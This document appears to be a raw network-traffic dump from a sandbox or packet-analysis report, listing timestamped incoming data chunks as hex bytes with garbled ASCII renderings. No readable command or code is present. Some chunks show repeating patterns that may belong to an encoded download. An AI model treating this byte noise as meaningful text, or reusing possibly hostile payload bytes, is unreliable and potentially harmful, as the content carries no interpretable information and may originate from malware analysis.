                                                                                                                  2023-08-29 17:16:41 UTC12INData Raw: a9 20 d7 ae 5e 8d c5 63 f1 58 7c db f6 ed cb 2b cb 3e 9f b7 b5 ad cd be 60 2f 14 0b 74 1a 4d ad d6 a4 33 99 50 30 48 a5 51 0f 1d 3a ec 74 3a 4f 1c 3f 7e e0 e0 81 37 df 78 43 24 12 d7 d7 d7 27 53 c9 85 85 79 12 89 4c 67 d0 53 a9 14 9d 4e 5f 5e 5a f2 fb 03 db b6 6f 87 cb e5 0f 3e f8 80 44 22 ce cf 2f b0 58 4c 95 4a dd 7f f2 24 76 a4 0e 2e 97 c7 27 c6 73 b9 dc d1 0f 3e e0 70 38 99 6c 06 7b c6 78 2c 7e fc d8 31 3a 9d 8e 54 11 02 9e 50 2a 97 48 44 d2 81 83 07 6f 52 05 93 c9 54 2a 95 52 99 ec f9 9f ff 6c e7 ae dd 97 07 06 0e 1d 3e f4 da ab af ca 64 72 2a 95 2a 10 0a 72 b9 5c 67 67 d7 a2 dd 1e 8e 84 cf 9d 3b 97 cf 65 eb 8c c6 53 fd fd 07 0e 1e 1c b8 34 c0 e5 71 e9 74 3a 84 c7 9f 3c 71 e2 a9 a7 9f 0e f8 fd ad 6d 6d 8b 4b 8b f1 58 3c 91 4c f6 f4 f4 38 1c 8e 60 30
                                                                                                                  Data Ascii: ^cX|+>`/tM3P0HQ:t:O?~7xC$'SyLgSN_^Zo>D"/XLJ$v.'s>p8l{x,~1:TP*HDoRT*Rl>dr**r\gg;eS4qt:<qmmKX<L8`0
                                                                                                                  2023-08-29 17:16:41 UTC16INData Raw: 69 b4 64 2a 25 14 0a 93 89 44 2c 1e c7 7e 1e b2 58 ac eb 43 43 4d cd 4d 3c 1e 7f 68 68 e8 f4 a9 53 df ff 8b bf c0 e3 f1 08 52 41 90 2a d6 20 12 89 9c 38 7e 6c ff 81 83 f9 7c ae 54 2a d7 d7 d7 0f 0f 5f 6f 6d 69 c5 02 27 38 1c 4e 2c 1a 25 91 c9 42 a1 10 eb 37 97 cb 25 93 49 b9 5c 4e a7 d3 51 14 9d 9d 9d dd 68 d7 fb ce 77 be 53 2c 16 c2 a1 b0 c1 60 40 01 80 61 58 28 14 86 c3 e1 72 a9 14 0a 85 94 2a 95 48 24 8a 46 a3 d8 8a ef f3 7a 49 64 92 c5 d2 e0 70 38 74 3a dd dc dc 1c 82 20 4d 4d 4d c1 60 70 69 71 b1 77 f3 e6 91 e1 e1 a6 e6 66 2c f1 01 36 80 74 3a 1d 8b 45 3b 3b bb 8a c5 62 b1 58 ac 56 11 04 a9 52 28 14 a7 c3 31 37 3f b7 7d fb 0e 02 81 e0 5a 5b 33 5b 2c 38 1c ae 58 2c 24 93 a9 60 30 28 93 c9 e8 74 3a 87 c3 c9 65 b3 1e af 97 46 a3 11 89 04 8f db b3 79 cb
                                                                                                                  Data Ascii: id*%D,~XCCMM<hhSRA* 8~l|T*_omi'8N,%B7%I\NQhwS,`@aX(r*H$FzIdp8t: MMM`piqwf,6t:E;;bXVR(17?}Z[3[,8X,$`0(t:eFy
                                                                                                                  2023-08-29 17:16:41 UTC20INData Raw: 22 91 58 2c 91 00 00 14 4a 65 5b 5b fb d0 e0 a0 4a a5 f6 7a 3c 24 12 49 2a 93 7d 1a 55 10 89 c4 ab 57 af 1a 8d f5 d8 09 61 b9 5c 56 c8 e7 77 ee da 05 41 50 be 50 30 99 cd 58 b3 6a b5 da b7 6d 1b 16 ed 9b 4c 24 eb 8c c6 6a b5 6a b3 d9 b0 5c 58 2a b5 4a 2e 57 74 75 77 79 bd 1e 02 9e a0 d3 e9 e4 72 05 97 cb c1 e3 09 3a 9d 0e 82 20 a5 52 b1 2e 47 ad d6 d4 19 8d 7c 3e 5f a5 52 a1 e0 c3 af 80 c3 e5 2a 55 4a 1a 8d f6 f0 c3 8f 44 c2 91 58 2c 6e fe a8 eb be be 6d 24 22 a9 52 a9 a8 54 ea 7c be b0 63 e7 ce ed 3b 76 0e 0e 0e 62 5a d5 6a b5 66 b3 65 6c 6c cc da d4 28 14 0a 53 e9 54 5b 7b 7b 20 e0 cf e5 72 c6 fa 7a 00 40 24 12 69 6b 6f cf e7 f3 58 5c cd dd 9c 46 1f 4f cd ae 57 e3 3e f1 e9 ed 7a 3f fd c9 4f 14 4a 45 77 77 4f 2c 16 35 9b 2d 00 80 60 30 c8 e3 f1 8a c5 e2
                                                                                                                  Data Ascii: "X,Je[[Jz<$I*}UWa\VwAPP0XjmL$jj\X*J.Wtuwyr: R.G|>_R*UJDX,nm$"RT|c;vbZjfell(ST[{{ rz@$ikoX\FOW>z?OJEwwO,5-`0
                                                                                                                  2023-08-29 17:16:41 UTC24INData Raw: 63 20 10 b0 2f 2c b0 58 ac 54 2a d9 de de 51 a9 54 02 c1 c0 33 cf 7c f1 c6 8d 1b ab ab ab 65 b8 0c 97 e1 99 99 99 42 a1 b8 68 5f 60 b1 d9 1e b7 c7 da d8 e8 76 ad b1 d8 ec 35 a7 f3 c0 c1 43 e7 ce 9e 25 12 89 e9 54 fa e7 3f ff b9 42 21 17 0a 45 78 02 1e 87 c3 61 f1 27 97 07 06 1e 79 f4 d1 f3 e7 ce be f0 c2 f3 d5 2a d2 7f f2 64 28 14 52 28 95 43 83 d7 88 44 a2 42 a1 ec dd bc 19 7b 46 00 40 3a 9d 26 10 88 f7 68 82 d5 f6 7a 35 1e 44 88 44 62 43 83 15 2b 0a b1 6d fb 76 1c 0e 87 87 f0 d8 49 7d 16 8b 25 93 c9 48 44 e2 be fd fb 0b 85 c2 da da 1a 8a a2 22 91 58 22 91 00 00 a4 32 99 80 cf 6f 6c 6c e4 f1 f8 f1 44 5c ab fb 30 ba 80 80 27 f0 f9 02 00 80 58 2c 51 28 e4 1e 97 4b 2c 16 33 98 cc ee ee 6e 00 00 16 5f 21 91 4a 05 42 01 00 40 2a 95 76 75 75 85 42 21 26 93 89
                                                                                                                  Data Ascii: c /,XT*QT3|eBh_`v5C%T?B!Exa'y*d(R(CDB{F@:&hz5DDbC+mvI}%HD"X"2ollD\0'X,Q(K,3n_!JB@*vuuB!&
                                                                                                                  2023-08-29 17:16:41 UTC28INData Raw: 63 da 6e 3c 99 30 f7 3c 5c 51 37 d3 45 d3 82 8b c3 cf 1f cf 3c ad 88 b2 ec ad ee 2b 20 7b c0 11 c6 ce 6b 09 69 d0 5b 71 96 a0 8a c3 56 05 1f 63 32 ba 7f ca d0 13 9f b1 6f dc d3 b2 f6 9a b0 84 67 d0 bd 01 2d 0d 3b 21 cc 6e a6 40 8c 2d e3 2a f3 f0 24 4e 3f ea a8 52 65 41 9b 44 8e ac af 66 4b a5 c5 9c aa af d4 dc 43 0a bc 82 88 84 d4 e1 dc 05 a0 8c 43 a8 39 ea c6 78 2e eb 9e 9b c3 2a 34 93 71 ba 2b 2f 29 48 2f fc 63 b4 21 b1 f0 77 da d0 80 49 f4 7d 2d 40 8c 2d 03 45 5f 47 9e 75 77 10 a4 01 4d 49 f1 3c af ef ca 39 47 c8 19 d0 f5 3c c2 66 35 71 95 86 ee 49 19 ce ca 0e bc 80 71 13 34 59 01 6b 0b d8 d6 1a 8a 57 4a 56 f0 3f 7a 80 79 e0 7d 75 87 8c e4 79 f1 dd 9d 91 19 d0 c1 c6 0d 7e 96 a2 1d d2 64 6f b3 69 e0 4c 4a 47 09 6f fa 21 3d 41 9b 20 bd 75 1f 53 8c ac 6b
                                                                                                                  Data Ascii: cn<0<\Q7E<+ {ki[qVc2og-;!n@-*$N?ReADfKCC9x.*4q+/)H/c!wI}-@-E_GuwMI<9G<f5qIq4YkWJV?zy}uy~doiLJGo!=A uSk
                                                                                                                  2023-08-29 17:16:41 UTC32INData Raw: 33 7f 80 9c 97 e1 cd 19 8c 00 f5 50 5b 4d f8 1c 53 82 f1 18 8d df b4 ad 86 8a ce db bc 8b 6a 0f b8 27 a8 80 35 e4 a0 8e 3b a0 3c 61 1d b5 d4 ef bc 9f eb 02 97 91 c1 b8 71 53 da 42 7a a6 c3 2d 95 ac 98 d1 dc 05 9f 55 24 15 a6 ae d8 09 d9 4b 89 af c8 41 94 0b 38 2f d2 b6 fc 7f ab 8a 1d 7b a8 bc 73 ec 35 21 6c 0a 70 ee 1a d0 c5 ce e9 f2 d4 e1 a6 6f 7a de d2 25 28 92 0f 5f 82 ad 6b 55 0b ee ee 29 39 12 e2 2a 35 71 c5 0a df 9a 71 e4 87 2c 61 0f bb b4 5f 73 d4 86 fe 97 e6 98 51 28 86 56 21 e0 49 3e 6c a5 60 5b 68 d0 85 44 c2 a4 e0 1b 68 ab 99 12 e2 2a 65 75 07 9b 35 cd bc f3 50 c2 dc 25 b0 6f 98 90 6d 59 13 4b de d2 ea 29 79 de d2 bb 28 24 c4 6c 20 42 6f 1a 12 6b 8c ba f1 13 b2 65 d4 86 0e e8 58 07 07 4f 6a 5d 13 d1 45 41 9b 58 01 eb 73 65 4f 49 99 1b 20 ea c8
                                                                                                                  Data Ascii: 3P[MSj'5;<aqSBz-U$KA8/{s5!lpoz%(_kU)9*5qq,a_sQ(V!I>l`[hDh*eu5P%omYK)y($l BokeXOj]EAXseOI
                                                                                                                  2023-08-29 17:16:41 UTC36INData Raw: 3e a2 0b 06 7a 30 f6 0d 32 76 d7 45 31 9e b0 a9 76 23 25 a0 39 b9 e7 2b 94 21 9d 98 61 5c 92 15 ea 35 ec 7b 35 f0 25 e1 7c d0 91 17 a4 43 85 9a e3 85 7f 63 98 f7 d9 b4 f7 05 3f c3 c2 82 0c 5b 80 3f e2 52 80 2b 20 aa b1 ca be 4e 3f b3 b4 67 9b 35 f7 69 aa 4f 5a 11 39 77 e6 73 3a b7 be 2a bf b3 5d f2 04 6f 4a ec 5b 3e bc 82 74 51 f3 b8 71 93 87 6d 3e 66 45 e8 0a e8 4b d7 43 67 34 fd 6a c0 5d 72 31 63 74 e2 de 7f 74 3a b9 96 e6 28 ca 32 ee 3d ae a6 26 19 a4 39 37 8e f9 81 7d e2 12 1f 8f 7b 90 23 2b 45 7f 33 ed f8 d0 03 b4 f0 50 4b 87 60 3c 82 8f 6a ff 73 19 50 38 28 f8 4d 32 97 c7 6f 2a b6 ac 11 84 6e 86 ac 17 6f 8e 6f b2 a7 a2 33 a6 2a 04 cd de 61 0d 9a 67 58 de dc 3a 7a 2a e7 53 5f ff 6f b1 ac b6 ac b5 b7 62 82 dc 65 0d dc bc b4 a7 36 a3 af 56 84 40 45 da
                                                                                                                  Data Ascii: >z02vE1v#%9+!a\5{5%|Cc?[?R+ N?g5iOZ9ws:*]oJ[>tQqm>fEKCg4j]r1ctt:(2=&97}{#+E3PK`<jsP8(M2o*noo3*agX:z*S_obe6V@E
                                                                                                                  2023-08-29 17:16:41 UTC40INData Raw: 61 5b 78 e0 5d dc 53 d5 ec 1d 31 84 6f 45 da c0 41 28 a6 82 a2 ae fe c1 41 20 74 bb 6e dc 53 19 21 1b be 03 9c 25 af d6 ce 6c 8e 1b e8 e7 b7 66 32 3d d9 35 37 50 9f 31 37 d0 da 35 03 ea 48 6f 9a 26 ac 8a 22 2f 7f fc 23 ba 74 1e 12 9e a5 c9 70 b7 59 a9 05 f5 00 88 93 f0 62 f7 ba 3e fe 27 17 7e fa 3e ef ec 43 7d a7 39 a1 6b a3 1e b0 a9 76 23 65 36 34 73 84 d0 c5 3e c6 a9 22 31 61 c8 39 2d 0e 97 55 ad f3 45 6e d0 55 d6 45 79 2f e6 3f af ed 39 4a 94 08 e0 c9 69 d1 08 9d 61 6f ff b3 ab 4d af ba e4 77 5d 0e de 37 6a 19 e7 6d fa 10 63 8c 1a a0 bb ed 04 51 9f 19 9b 96 1d 37 47 92 cc e5 57 b5 3b 60 ed 37 2a ba 27 46 32 e8 cf 5b cf 96 96 c7 10 f2 cd 4b 4e 45 fe 52 c2 dc 25 65 ce 94 f3 9c 71 e1 a5 22 8b 04 10 99 66 02 33 6d 49 19 f8 cf df 53 f5 29 89 81 d6 2b f3 12
                                                                                                                  Data Ascii: a[x]S1oEA(A tnS!%lf2=57P175Ho&"/#tpYb>'~>C}9kv#e64s>"1a9-UEnUEy/?9JiaoMw]7jmcQ7GW;`7*'F2[KNER%eq"f3mIS)+
                                                                                                                  2023-08-29 17:16:41 UTC44INData Raw: 5c ed 96 96 9c 85 a1 df 18 64 b5 dc 9c 7d ad 96 b5 65 82 9e 7d e5 f4 5d d6 bc 01 6d 45 e7 f1 13 50 65 81 53 6f fd fe d4 5d 84 b2 15 aa b4 aa 9e 7e ad 79 6c 8a 1f 59 08 5d d4 a3 58 5f 41 81 04 37 57 e9 31 64 2b a1 55 52 e9 33 36 dd 54 f7 53 59 19 cd d5 74 92 c4 5b a2 fc b3 c3 0c a0 d4 a7 5d ed cc 5f 1d 6d c5 47 9a 28 59 37 b0 19 b1 90 18 81 d4 3a 6e 5f 5a ed 53 9e b1 00 ad 6d 20 b9 6c 2b b8 a7 02 6f 42 f7 07 28 65 3d 4f 3d 73 ed 5d 85 d7 a4 a2 92 32 93 4d 6d 3c 02 b5 e0 fc a3 b5 38 f1 ab a2 92 3c 02 89 6c e1 55 1d 96 4e a8 d6 20 bd 57 69 85 35 d2 a7 6f 99 dc 8b 85 ca 57 79 49 5a 5f 5d 41 59 53 5d c9 ef 9e 5d ae e4 dc b1 3c e2 01 0a 6d 3a 8e d6 9f d9 57 55 6d b1 57 37 2d 4e 04 41 07 b1 5f 35 ed b1 57 4b 6e db 57 37 6d b0 3d 5c 3b 3a af a2 3e b1 5f d6 9d 32
                                                                                                                  Data Ascii: \d}e}]mEPeSo]~ylY]X_A7W1d+UR36TSYt[]_mG(Y7:n_ZSm l+oB(e=O=s]2Mm<8<lUN Wi5oWyIZ_]AYS]]<m:WUmW7-NA_5WKnW7m=\;:>_2
                                                                                                                  2023-08-29 17:16:41 UTC48INData Raw: 06 ca ea 3c de 90 c1 f2 c3 2c 2c d4 6d 2f 4b 14 6c a9 44 c2 fd 8f 4e d4 68 22 65 9b 49 84 8c a1 cd 3e 32 34 bd 9c e1 76 de 1c 05 a6 bc 6e 98 c7 24 9f 51 79 e9 9b e1 75 ef a4 fe 9e 12 a6 91 c1 ac ab d3 36 4c 77 11 d5 6e c8 31 b4 9f 6f 32 a1 15 c5 54 08 ab bb 41 c5 6d fe 19 7d ec 2e 88 f6 63 fc c6 fb 0a c1 c1 fb 66 83 11 b4 5e 8e 8a a1 f9 fd c1 7d 0d ba 44 7d c0 de 4c 04 ac c1 8a b1 f5 8d 0e 16 05 8f 0e 79 a0 2e 80 f6 ca de 00 5f 2f f9 2b e4 a0 36 0a b9 cc de c1 b4 1d 8b 1d 7d fd e5 11 11 e2 4e 92 14 e2 a4 15 16 e2 d6 fd fb f1 21 0e f5 c5 9c d3 a4 ca de b4 fb d8 de 21 df fd 2c 0e f5 4d ed 09 fb 5b c6 84 3d 99 88 3b 90 e0 2a 5c 79 b8 36 81 bc 19 6d e1 5a 2d f7 79 0b 3f 6d ac fd ed 8e 08 95 2f 25 06 d0 ac 44 44 08 06 f0 03 b7 0e 3e 08 b5 e8 31 08 0d e4 e2 6b
                                                                                                                  Data Ascii: <,,m/KlDNh"eI>24vn$Qyu6Lwn1o2TAm}.cf^}D}Ly._/+6}N!!,M[=;*\y6mZ-y?m/%DD>1k
                                                                                                                  2023-08-29 17:16:41 UTC52INData Raw: 49 e6 f4 55 4d ed 1c d4 bc 4d c4 52 b4 4f fe 17 54 aa f4 a7 bf 7f bb 27 7d 8a ab da 08 9d 91 50 4d 3d b9 bf 7c 64 f3 c0 d4 28 45 d4 8d 10 45 57 29 2d da 47 5c ca f2 f1 49 89 4f 93 09 7d 31 f6 5d 19 95 2f d6 38 a1 71 f7 8d 84 15 f1 0d 98 1f 6b 01 b0 40 fd 61 58 97 56 ac b9 22 47 6a 98 52 7b 74 93 1e d6 38 41 dc 10 75 45 bf cb 4d 0c 12 ec 68 58 e7 12 8f a3 b5 75 6c 0d 92 fa 05 7b f3 13 3c b9 73 a2 bf 18 7a 18 91 e1 bf 81 97 0d 74 74 0e b5 d7 0d 84 b2 55 fc 24 51 1a b1 85 21 93 1d 16 14 47 3d 0c 79 bf fd a8 d3 2a b5 29 91 58 3f 69 41 ab b5 97 72 16 5c 69 81 e8 70 d9 9c b6 bf 40 e0 90 18 91 13 39 5f d1 50 df 7d 91 32 b5 a6 e4 f0 fa a1 ee fd b7 aa ed a8 f6 d4 8c 5e 14 5e 66 3d 02 51 2f b2 b7 c6 91 38 5f 75 64 f6 b1 54 8d e0 73 57 aa f4 af 9f 5b 7b 67 de da c9
                                                                                                                  Data Ascii: IUMMROT'}PM=|d(EEW)-G\IO}1]/8qk@aXV"GjR{t8AuEMhXul{<szttU$Q!G=y*)X?iAr\ip@9_P}2^^f=Q/8_udTsW[{g
                                                                                                                  2023-08-29 17:16:41 UTC56INData Raw: f7 4e 20 a6 05 e1 37 70 e0 c5 00 9f 6c c3 c1 75 bb 83 09 a5 05 ca 24 dd 69 c2 d1 71 3f bb 19 a7 6d 62 82 70 66 4c 83 58 3d ce 14 61 d4 ce 05 9c 36 4d 46 74 d7 cc 48 f4 e8 cf 03 83 bc e6 8a 3c 05 18 ab 15 68 86 50 1c 7a 30 03 8a 6e e8 00 6b eb 95 80 d3 6c 9b 21 7d bd f6 8a 94 a4 ea 88 bc d1 4f 21 f4 e7 86 01 dc 64 84 21 7f ad e2 88 92 af cf 8c f5 8b 04 01 f4 df ce 0c 7d d9 9e 75 f6 fe 04 04 c0 e8 dd 0f 9e 3f cf 43 ce 1c f9 00 f2 e5 85 79 37 be 4d c1 da ef e6 48 fc 64 86 11 77 ef cf 43 9d ad c2 88 b6 f9 a6 99 bc 0a 62 4f 37 9e 0c 0d 36 91 86 61 8c bc 26 62 18 2e 57 01 ff e7 4a 88 b5 2e c1 82 8c e5 ce c3 bd 8b 95 c1 a3 ef ed bc 01 a5 f8 d3 bd dd 17 84 fe 7f 34 89 fe ec df 17 b5 eb cf 2f 6a 95 4c 1b 70 85 cf 10 79 5c 27 ea 77 ad 9e 51 1c d0 38 9c fe 2d 4b 0b
                                                                                                                  Data Ascii: N 7plu$iq?mbpfLX=a6MFtH<hPz0nkl!}O!d!}u?Cy7MHdwCbO76a&b.WJ.4/jLpy\'wQ8-K
                                                                                                                  2023-08-29 17:16:41 UTC60INData Raw: 7d 4f 9a e5 56 e4 fb 5b de 6e e0 3d 57 6a 43 47 c1 9e a1 de 18 a5 3a 77 18 a5 94 57 7d 8f c1 de 1c 3f ed 86 18 af d1 13 5b 09 f1 51 37 6d b5 3f 5d 7d b1 57 35 67 de 24 39 4e f4 46 dc cc 2b ab 3f 6c 40 39 b5 79 1f d3 ff 6a 0b a7 5d 6d 70 b5 5c 0e bb 7f 52 da a5 46 de 97 21 6d 29 7b 09 36 5c bc 51 35 50 6c e1 56 59 6f 32 af 67 18 a1 54 be 6d 51 54 b5 2b 3c a8 a2 86 09 7d 35 69 73 e5 7c 1b 73 00 01 ac e6 9f 55 e6 e1 75 5f fd 3a 45 52 ec 7e 93 0c 41 d3 77 01 6d c5 37 71 1d b3 47 15 ee 53 a9 4d 6c 38 07 15 84 54 57 5c 19 40 a5 5c 8d b5 43 b0 6f b2 97 45 6d c4 0f 9a 28 40 ca 3d 6c a7 93 9e 76 e1 44 ed 3e e0 da 08 ad d6 d7 5a 4c c5 75 1c 17 19 44 7e 1c 0c e9 4c 7e b3 dc 10 ad 81 3b de 10 49 dc dd cf 51 4f ff e9 13 12 a5 e4 c0 03 c2 9f fa 83 de 1d a7 17 42 1d a7
                                                                                                                  Data Ascii: }OV[n=WjCG:wW}?[Q7m?]}W5g$9NF+?l@9yj]mp\RF!m){6\Q5PlVYo2gTmQT+<}5is|sUu_:ER~Awm7qGSMl8TW\@\CoEm(@=lvD>ZLuD~L~;IQOB
                                                                                                                  2023-08-29 17:16:41 UTC64INData Raw: ac 88 bf 75 e1 e6 8c a1 8d 1a 53 1c 84 a5 c2 d7 4c c8 21 64 64 83 d5 7f fd 8b 54 2c 72 ac 85 2a 09 5a 63 28 64 9b e1 c7 a0 0f 51 97 66 84 3d 7d a0 4e 62 14 ed 1e 49 7d a8 22 23 c9 89 2c 72 a5 a9 e1 a1 bd d4 ae 81 d9 99 fd 6b 64 d4 32 53 1d fd c6 44 20 8e 8e 1d 23 f9 4f 3a 72 bc b4 19 29 ec 36 d3 f5 71 dd f7 fa d0 80 18 69 cf 8b 09 83 c1 f7 13 00 ef 83 0d 14 c8 86 88 a4 a1 7a 01 65 59 de 07 7d 61 9e 41 11 ed 3f 37 7d bd fe e4 f4 6c ef 34 7d bd fa 8a b1 fd 3e 09 e1 8d c8 40 14 cc 9a 83 77 fd 45 43 f4 c5 47 40 ec 66 9c 2d 7d ef 9f 00 d7 66 83 11 7f bc ee 01 7d bd de 8a bd c9 47 49 f6 f9 3c 8c e4 66 86 39 7d a7 4e 09 7f ad f2 88 b6 e1 9b 02 64 8d 47 40 d4 58 ce 65 7d 6f 91 b0 46 ed ca 88 f5 48 ce a1 ea e9 3c 05 9e 95 4f 04 7e 2f da 49 e4 bc 6e 00 8c 7c ff 03
                                                                                                                  Data Ascii: uSL!ddT,r*Zc(dQf=}NbI}"#,rkd2SD #O:r)6qizeY}aA?7}l4}>@wECG@f-}f}GI<f9}NdG@Xe}oFH<O~/In|
                                                                                                                  2023-08-29 17:16:41 UTC68INData Raw: d6 2b a1 d5 9c 32 ef dd a3 ae b3 6d 5c 30 ce 57 62 6d 8e 57 62 6d 8e 57 82 52 b1 68 5d 52 b1 48 5d 61 b1 54 b1 6c 71 2d a1 6d d5 37 5d 6d c7 48 5d 72 b1 48 5d 72 b1 a8 42 6d ae 57 42 6d ae 57 42 6d ae 57 42 6d ae 57 52 72 b1 48 5d 72 b1 5f 5d 48 f0 07 0d 6d f5 16 09 2c 94 0b 10 04 b1 34 2f 02 c2 38 3b 19 ed 57 0a 04 df 33 32 1a c2 0b 5d 3e c5 36 2f 19 91 1a 38 6d df 22 01 3d c3 38 3a 1f d5 36 30 09 b3 22 2d 72 ba 5f 5d 2e b1 38 14 03 d8 23 34 0c dd b7 34 17 d4 12 25 92 b4 48 5d 1c bd 57 1e 1f d4 36 29 08 f8 39 9d 1e c5 36 33 0e d4 68 5b 72 b1 d6 33 48 e6 1e 13 29 f8 05 15 48 f1 79 13 28 e5 0b 1b 6d 92 32 6d 1a de 25 36 52 b9 48 5d 1b 83 57 73 5d 9f 62 6d 5a 83 60 42 d2 b0 58 5d 62 b1 58 5d 62 b1 21 6e 43 cf 62 02 6c be 57 52 6d be 57 52 6d 85 51 69 ac c1
                                                                                                                  Data Ascii: +2m\0WbmWbmWRh]RH]aTlq-m7]mH]rH]rBmWBmWBmWBmWRrH]r_]Hm,4/8;W32]>6/8m"=8:60"-r_].8#44%H]W6)963h[r3H)Hy(m2m%6RH]Ws]bmZ`BX]bX]b!nCblWRmWRmQi
                                                                                                                  2023-08-29 17:16:41 UTC72INData Raw: e2 45 44 d0 11 08 80 6c 11 8e 81 fb 06 10 00 34 e4 07 c2 4c a0 94 01 f4 ed a8 38 f5 98 c3 8a b5 d1 ce 02 35 6c f6 51 b1 ed ce 01 80 ef fd c1 37 a0 94 91 e0 ed cd c1 e9 e9 0e 01 0b 12 ce 6d f4 55 4f 30 f4 ed 8e c5 f5 f4 ce e1 f5 2d ce 0f eb 57 c0 01 40 e4 ce cc d5 55 cf 4d 39 cc 9a 01 9c 84 bd 21 84 9f a1 66 f4 9f af 6c d4 8e af 6f 9a ed a1 75 d4 8f ab 21 86 98 ce 6f d4 84 a0 21 b0 a2 9d 01 d4 80 a1 65 91 c3 c3 0c f2 e7 0f 3b f5 ed 12 3b ce f3 56 09 af b9 83 c4 f4 0e 89 59 b9 6f 46 c1 f5 43 b3 5e b9 74 0e 00 d4 f6 89 5b b9 6c 0e 00 0e a9 46 46 b9 72 0c 09 a1 a0 22 c3 f3 65 90 4c be 2d cf 5e a9 bf 0c 08 84 bf a7 62 9c 2c c1 cc dc ec f4 4d 74 ec ca 01 15 0d b6 49 33 c0 ce 0e f5 e6 cf 07 f4 ed ee 4c b4 d3 8e c1 f5 ed ce 13 81 6d 0f 11 09 ed cc 31 b5 ae 8e 3e
                                                                                                                  Data Ascii: EDl4L85lQ7mUO0-W@UM9!flou!o!e;;VYoFC^t[lFFr"eL-^b,MtI3Lm1>
                                                                                                                  2023-08-29 17:16:41 UTC76INData Raw: 5c 62 b1 d4 b5 69 5a e9 d8 a4 cd 3d 50 69 b9 18 5c 69 1c 13 cb 6c b5 6c 55 aa ce 40 dd 28 3a 5b de e4 f1 43 de 2d 38 5b e6 2d f0 47 9d 22 58 57 a2 92 4e 97 3a ac 8e 27 7d 56 74 2a 1f d9 70 3c 9c 03 f7 43 d4 5d 30 38 e4 2d 75 57 18 6e 51 ae 5e 9c b2 96 18 07 33 3f dd 67 ad be bb 2c 7c 56 82 ed 61 dc 8c 46 91 82 76 85 8a bd 1c 3d cd 55 1d e6 5b d2 b0 13 9b 97 58 0d b5 7c 90 ed bc 7f d0 61 3a dc d5 7c 3a 7f 1f 27 99 de 74 6d f0 f2 9d 20 fb d6 fe 18 56 d3 ad 75 f0 76 dd 46 76 dc 74 e6 7c 7c dd 82 b5 6c 95 2d a0 9f d8 a4 cf 73 5c ac 97 7c b4 e0 b5 c4 d0 31 b1 fc 59 e6 58 dc 4e e6 b9 47 d4 7d 38 5c 3c 65 72 53 10 c1 c4 b8 bf 6a 10 0a 01 cd a1 3b 7d 4f b3 0b 7d 1b b9 7c a0 e0 e5 4d 5c cc aa 67 d0 29 be 56 d6 b7 91 da 27 6c 9a 8a fd 7a f1 da d9 15 4e 97 5d 35 3c
                                                                                                                  Data Ascii: \biZ=Pi\illU@(:[C-8[-G"XWN:'}Vt*p<C]08-uWnQ^3?g,|VaFv=U[X|a:|:'tm VuvFvt||l-s\|1YXNG}8\<erSj;}O}|M\g)V'lzN]5<
                                                                                                                  2023-08-29 17:16:41 UTC80INData Raw: 99 ea 82 0b ec ba 1e a4 e3 ca 19 d1 dd c0 81 8d e8 86 82 fc 25 30 41 14 b7 bb 0b 7f 69 df 33 f0 c6 1e 48 14 dd 23 7f d1 ef f5 f1 fb 91 c0 3a 35 92 c4 00 84 e9 d2 c7 f0 c5 ce ea fc e8 5a 01 fb 7c cb 41 cf 28 b2 da 5d 7c ca 4e b4 79 c5 19 15 f0 e3 c0 e7 ab 8f b0 c2 3d ce 25 df 2f 3e 0b 94 29 4b fe 85 e0 c1 8e b0 4d eb a1 e4 fb fe a0 e4 cd ca 11 94 eb f9 8a 39 ad fd c1 79 91 ea 45 54 f4 ae 00 95 e8 43 97 94 5c ce 01 07 27 65 b1 f5 e5 7f 00 7f 17 ce 1b a6 f4 08 09 94 ee 9d 18 17 06 ca 13 ef fd c3 09 f2 98 a4 91 f6 8b 73 dd 98 fd 31 fe 79 6b ff 1f 79 53 5a a3 3d 8d c2 ef c7 24 4e 47 7c 3c c6 01 7e fd 0f e0 e4 e6 04 32 74 3f 47 4e 08 67 5e 05 45 d2 4e c8 77 2a de 8b 7c eb 8e 1b c5 4b cf f1 7e 7d df 07 34 a7 46 0b f2 e8 ba 00 a4 fb da 41 7d a2 3a 01 79 e1 e6 3a
                                                                                                                  Data Ascii: %0Ai3H#:5Z|A(]|Ny=%/>)KM9yETC\'es1ykySZ=$NG|<~2t?GNg^ENw*|K~}4FA}:y:
                                                                                                                  2023-08-29 17:16:41 UTC84INData Raw: 69 e7 f5 5d a2 e7 ad 5d 63 e5 b1 5d 1c 18 81 13 9d 7b a0 2f 49 10 b3 17 fd 6f 3a ad 66 95 c7 58 d8 fd b0 43 5c 1f a5 58 d8 70 a0 3b 5b ab b1 27 bf 5d e2 02 0b 3a 3a 1d 70 dc 97 f6 5c 78 3a 42 5c 74 9a 57 b5 46 5b d4 a0 92 c4 5d 7f d0 71 50 a2 84 4b f7 5a 50 4b 17 a3 6d b1 58 df 82 e0 3b 50 2c f0 7d d8 a4 be d3 bc bd b1 ee 5d 6d 91 57 5d d3 d1 9f 1a 49 b1 e8 ac 7f 0b 57 dd 7d 42 f2 19 e6 84 56 57 46 73 f4 1c 68 10 0e ac 4e 9a a5 8d 6d 30 57 d4 cf b0 ef 5e bc 9d b6 77 65 8a 9d 2f 65 30 d7 9c 6d 31 a8 a2 86 b3 57 5c ed 38 5f de ad b3 6a dd 2d 9f 2f 2f 8d 09 56 51 22 b3 12 5f 1c 91 25 4d 8d 3a 6a 59 4d 8d dc 40 6d b0 07 5d 6e 5b d2 a2 62 3d 8a 5c cd a9 28 55 e8 6a 58 db be b8 c7 5d cc a9 d7 5c e8 71 58 d8 6f 77 96 5d d1 dd 14 5d e6 84 d5 55 4f b0 23 2c e6 a4
                                                                                                                  Data Ascii: i]]c]{/Io:fXC\Xp;[']::p\x:B\tWF[]qPKZPKmX;P,}]mW]IW}BVWFshNm0W^we/e0m1W\8_j-//VQ"_%M:jYM@m]n[b=\(UjX]\qXow]]UO#,
